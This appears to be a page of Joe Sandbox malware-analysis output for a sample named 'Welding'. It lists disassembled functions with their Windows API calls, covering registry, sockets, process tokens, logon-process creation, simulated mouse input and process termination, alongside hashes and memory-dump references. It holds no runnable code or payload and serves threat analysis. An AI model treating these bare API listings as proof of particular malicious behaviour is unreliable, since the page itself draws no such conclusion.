Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 56004f334c4552ab2bde25ff9a56683c6ab2f22f071a9fb399991b7d57e00661
Instruction ID: 0fd47c4f944ddf1a8f8046b6201f95e68e999b37d416d987bf7bed15914f156c
Opcode Fuzzy Hash: 56004f334c4552ab2bde25ff9a56683c6ab2f22f071a9fb399991b7d57e00661
Instruction Fuzzy Hash: FBB1383990024ADBDB60CFA9C9807EEB7F1FF08710F148529ED59EB254DB34AA50CB64

Function 00116A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00116BC6
_memmove.LIBCMT ref: 00116B01

Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC

_memmove.LIBCMT ref: 00116B74
_memmove.LIBCMT ref: 00116C5B
_memmove.LIBCMT ref: 00116C74
_memmove.LIBCMT ref: 00116C90

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 2696e12063a3b11363449afd863cb5a64b0c4321d8bd4eeec82fdae650dcda9c
Instruction ID: 193628e58f177182921f66acb549cf099ad597bf49fc7e22edaeb7ac7efbc00b
Opcode Fuzzy Hash: 2696e12063a3b11363449afd863cb5a64b0c4321d8bd4eeec82fdae650dcda9c
Instruction Fuzzy Hash: 1461B13150025AABCF19EF60CC81FFE37A9AF05308F054569F8955B293DB35AD85CBA4

Function 00130844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77

Part of subcall function 0013147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013040D,?,?), ref: 00131491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0013091D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0013095D
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00130980
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001309A9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 001309EC
RegCloseKey.ADVAPI32(00000000), ref: 001309F9

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 0f4e1b5f8348a338a36aaf835c59376d2da17287aa6b6d2ce401f142cf5a32ce
Instruction ID: 85baa0ef3de5f32106c0b2f715d741f0e108754e4b01435b0b814729b8bf45a3
Opcode Fuzzy Hash: 0f4e1b5f8348a338a36aaf835c59376d2da17287aa6b6d2ce401f142cf5a32ce
Instruction Fuzzy Hash: 79515731208200AFD715EF64C895EAEBBE9FF89314F04491DF5998B2A2DB31E905CB52

Function 00135DD6 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00135E38
GetMenuItemCount.USER32(00000000), ref: 00135E6F
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00135E97
GetMenuItemID.USER32(?,?), ref: 00135F06
GetSubMenu.USER32(?,?), ref: 00135F14
PostMessageW.USER32(?,00000111,?,00000000), ref: 00135F65

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 71434eb5e05b775cebb85162956b17cd419f9da35136507750c658a32282cfd7
Instruction ID: fe338ce9c71da44fd015828a12b13b2f9c6c4fe80bbc2611f642f11f0caaab95
Opcode Fuzzy Hash: 71434eb5e05b775cebb85162956b17cd419f9da35136507750c658a32282cfd7
Instruction Fuzzy Hash: F351AC75A00615AFCB15EF64C845AEEBBB6EF48710F114069F911BB392CB34AE418B91

Function 0010F688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

#8.OLEAUT32(?,00000000,?,?,?,?,?,?,00000024), ref: 0010F6A2
#9.WSOCK32(00000013,?,?,?,?,00000024), ref: 0010F714
#9.WSOCK32(00000000,?,?,?,?,00000024), ref: 0010F76F
_memmove.LIBCMT ref: 0010F799
#9.WSOCK32(?,?,?,?,?,00000024), ref: 0010F7E6
#12.WSOCK32(?,?,00000000,00000013,00000000,?,?,?,?,?,?,00000024), ref: 0010F814

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: fa1fb9da28abb80dc9dfba5ac12943542ddee13163f7d0fc527af7d6bcb5b269
Instruction ID: 28431bb5bc49d096878818ffe847c23633b3592cf29f0a48f4430694888b3c3f
Opcode Fuzzy Hash: fa1fb9da28abb80dc9dfba5ac12943542ddee13163f7d0fc527af7d6bcb5b269
Instruction Fuzzy Hash: 14514D75A00209EFCB24CF58C884AAAB7B8FF4C314B15856AE959DB341D770E951CFA0

Function 001129B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001129FF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00112A4A
IsMenu.USER32(00000000), ref: 00112A6A
CreatePopupMenu.USER32 ref: 00112A9E
GetMenuItemCount.USER32(000000FF), ref: 00112AFC
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00112B2D

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 92d0df429abb6da652b5b9af519c4066ee887898effe22ae20668a9c5d438987
Instruction ID: bc85813cd64ea27a20f9cc885644c81335735f984e1ebb25a533410317ca34f3
Opcode Fuzzy Hash: 92d0df429abb6da652b5b9af519c4066ee887898effe22ae20668a9c5d438987
Instruction Fuzzy Hash: E851DE7060434ADFCF29CF68E888BEEBBF5EF15314F104129E8129B2A1D77099A4CB51

Function 000B1B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3

BeginPaint.USER32(?,?,?,?,?,?), ref: 000B1B76
GetWindowRect.USER32(?,?), ref: 000B1BDA
ScreenToClient.USER32(?,?), ref: 000B1BF7
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000B1C08
EndPaint.USER32(?,?), ref: 000B1C52

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 4d5eb08884483636be9cc4e3524c22cc98ce43fa11e9a60f8e82ac554474c0ba
Instruction ID: 4d7d005e657c30a446e76ec9964c33b7d61684ae3c5bb1d7982e1f425a0e4684
Opcode Fuzzy Hash: 4d5eb08884483636be9cc4e3524c22cc98ce43fa11e9a60f8e82ac554474c0ba
Instruction Fuzzy Hash: 4241A131104200AFD711DF25CC98FEA7BF8EB49760F140569FA99972B2C7309885DB62

Function 0013BD10 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(001777B0,00000000,?,?,?,001777B0,?,0013BC1A,?,?), ref: 0013BD84
EnableWindow.USER32(?,00000000), ref: 0013BDA8
ShowWindow.USER32(001777B0,00000000,?,?,?,001777B0,?,0013BC1A,?,?), ref: 0013BE08
ShowWindow.USER32(?,00000004,?,0013BC1A,?,?), ref: 0013BE1A
EnableWindow.USER32(?,00000001), ref: 0013BE3E
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0013BE61

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: e5a39bfa2c6f9e14469777981f80407f8ac837254ecb75e14e89a327d0b73103
Instruction ID: 2b76070353539d3346690585d8f843c8749dad340638c820c01abdfa2e35ec80
Opcode Fuzzy Hash: e5a39bfa2c6f9e14469777981f80407f8ac837254ecb75e14e89a327d0b73103
Instruction Fuzzy Hash: D6416C35608144AFDB22CF68C4C9BD47BE1FF4A318F1841B9EB499F6A2DB31A845CB51

Function 00127788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,0012550C,?,?,00000000,00000001), ref: 00127796

Part of subcall function 0012406C: GetWindowRect.USER32(?,?), ref: 0012407F

GetDesktopWindow.USER32 ref: 001277C0
GetWindowRect.USER32(00000000), ref: 001277C7
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 001277F9

Part of subcall function 001157FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00115877

GetCursorPos.USER32(?), ref: 00127825
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00127883

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: abe0e2c25c8a63c90a72023e95b03efcd2bff486787b55f6bfad04f78b4eb407
Instruction ID: a1a8375576e0373bc6b8b372cb468e8d61af5b50550e1d9da8aa606f23a9bba6
Opcode Fuzzy Hash: abe0e2c25c8a63c90a72023e95b03efcd2bff486787b55f6bfad04f78b4eb407
Instruction Fuzzy Hash: AA31F032108315ABD720DF15D849F9BB7EAFF89314F00092AF99997191CB30E958CBA2

Function 0012696E Relevance: 9.1, APIs: 6, Instructions: 84COMMON

Download Yara Rule

APIs

#23.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 001269C7
#111.WSOCK32(00000000), ref: 001269D6
#2.WSOCK32(00000000,?,00000010), ref: 001269F2
#13.WSOCK32(00000000,00000005), ref: 00126A01
#111.WSOCK32(00000000), ref: 00126A1B
#3.WSOCK32(00000000,00000000), ref: 00126A2F

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: #111
String ID:
API String ID: 568940515-0
Opcode ID: 34f8eada4be5967f78e0be7f8e44ee53f486936e0977654881cfef4fc90a0fc7
Instruction ID: 1c82bef4c74ad4e25827f4872ee25e97989a8134881f4243adb93386aec8d47c
Opcode Fuzzy Hash: 34f8eada4be5967f78e0be7f8e44ee53f486936e0977654881cfef4fc90a0fc7
Instruction Fuzzy Hash: 812123346002119FCB00EF64DC89BAEB7B9EF49720F118558F956A73E2CB70AC50CB91

Function 00109431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00108CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00108CDE
Part of subcall function 00108CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00108CE8
Part of subcall function 00108CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00108CF7
Part of subcall function 00108CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00108CFE
Part of subcall function 00108CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00108D14

GetLengthSid.ADVAPI32(?,00000000,0010904D), ref: 00109482
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0010948E
HeapAlloc.KERNEL32(00000000), ref: 00109495
CopySid.ADVAPI32(00000000,00000000,?), ref: 001094AE
GetProcessHeap.KERNEL32(00000000,00000000,0010904D), ref: 001094C2
HeapFree.KERNEL32(00000000), ref: 001094C9

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 5c846ccd28e335cf2ebf57bf9fcb59bda36fd6d0439172e3149a8097b9b4fc3c
Instruction ID: 957291d72ad46f344f91cbc899579d40969127814c1aa9169a62a6bd3cbe8f43
Opcode Fuzzy Hash: 5c846ccd28e335cf2ebf57bf9fcb59bda36fd6d0439172e3149a8097b9b4fc3c
Instruction Fuzzy Hash: EE11EE36500204FFDB118FA5CD29BAF7BA9FB4A312F108018F981D3261C7769941CB60

Function 001091CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00109200
OpenProcessToken.ADVAPI32(00000000), ref: 00109207
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00109216
CloseHandle.KERNEL32(00000004), ref: 00109221
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00109250
DestroyEnvironmentBlock.USERENV(00000000), ref: 00109264

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 772e8cd6c5bc2c9c1c669824567b52c1bb480ab370a69f94e15d1b4f5df09f62
Instruction ID: 817c216761bc87652085304c5cf597fc249c4a441375691998918408c9529d4e
Opcode Fuzzy Hash: 772e8cd6c5bc2c9c1c669824567b52c1bb480ab370a69f94e15d1b4f5df09f62
Instruction Fuzzy Hash: 7211897610024EBBDF028F94ED48FDE7BA8EF09304F044024FE45A20A1C3B28DA0EB60

Function 0010C329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0010C34E
GetDeviceCaps.GDI32(00000000,00000058), ref: 0010C35F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0010C366
ReleaseDC.USER32(00000000,00000000), ref: 0010C36E
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0010C385
MulDiv.KERNEL32(000009EC,?,?), ref: 0010C397

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 78cd6a8a04b06c24e9fe20ccc35f7150d276818aefe90d9aef481fbb1a67790c
Instruction ID: a4956d321eda1fa7cee9d3deb8c9386e046cf4273dbb26d983bc4a2377abdf0b
Opcode Fuzzy Hash: 78cd6a8a04b06c24e9fe20ccc35f7150d276818aefe90d9aef481fbb1a67790c
Instruction Fuzzy Hash: 87014F75E00218BBEF119BA69C49B5EBFB8EF49761F004065FF08AB290D6709D10CFA0

Function 0013C552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 000B16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000B1729
Part of subcall function 000B16CF: SelectObject.GDI32(?,00000000), ref: 000B1738
Part of subcall function 000B16CF: BeginPath.GDI32(?), ref: 000B174F
Part of subcall function 000B16CF: SelectObject.GDI32(?,00000000), ref: 000B1778

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0013C57C
LineTo.GDI32(00000000,00000003,?), ref: 0013C590
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0013C59E
LineTo.GDI32(00000000,00000000,?), ref: 0013C5AE
EndPath.GDI32(00000000), ref: 0013C5BE
StrokePath.GDI32(00000000), ref: 0013C5CE

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 7292ae5f94dd4471bff74ef8671a0a3672051133bf82edf92ff30442540428c8
Instruction ID: 3d84eb51cdec1876087f4b1b93fb1e7b493c370223e3b3608cfe429fe423d5d8
Opcode Fuzzy Hash: 7292ae5f94dd4471bff74ef8671a0a3672051133bf82edf92ff30442540428c8
Instruction Fuzzy Hash: 20110C7610010CBFDF129F91DC48EDA7F6DEB09354F048011BA1856571C771AD95DBA0

Function 000D07BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 000D07EC
MapVirtualKeyW.USER32(00000010,00000000), ref: 000D07F4
MapVirtualKeyW.USER32(000000A0,00000000), ref: 000D07FF
MapVirtualKeyW.USER32(000000A1,00000000), ref: 000D080A
MapVirtualKeyW.USER32(00000011,00000000), ref: 000D0812
MapVirtualKeyW.USER32(00000012,00000000), ref: 000D081A

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 622842c7148dfe9d98a50e4ff746bcd1fb0a0c6afe322ab83af5dcf8c4e4eb62
Instruction ID: c0398f7881e84b51e4dc1405136f52c78081a1e1e5f6708c777a0719fcf0be52
Opcode Fuzzy Hash: 622842c7148dfe9d98a50e4ff746bcd1fb0a0c6afe322ab83af5dcf8c4e4eb62
Instruction Fuzzy Hash: 8F016CB09027597DE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A868CBE5

Function 001159A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 001159B4
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001159CA
GetWindowThreadProcessId.USER32(?,?), ref: 001159D9
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001159E8
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001159F2
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001159F9

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

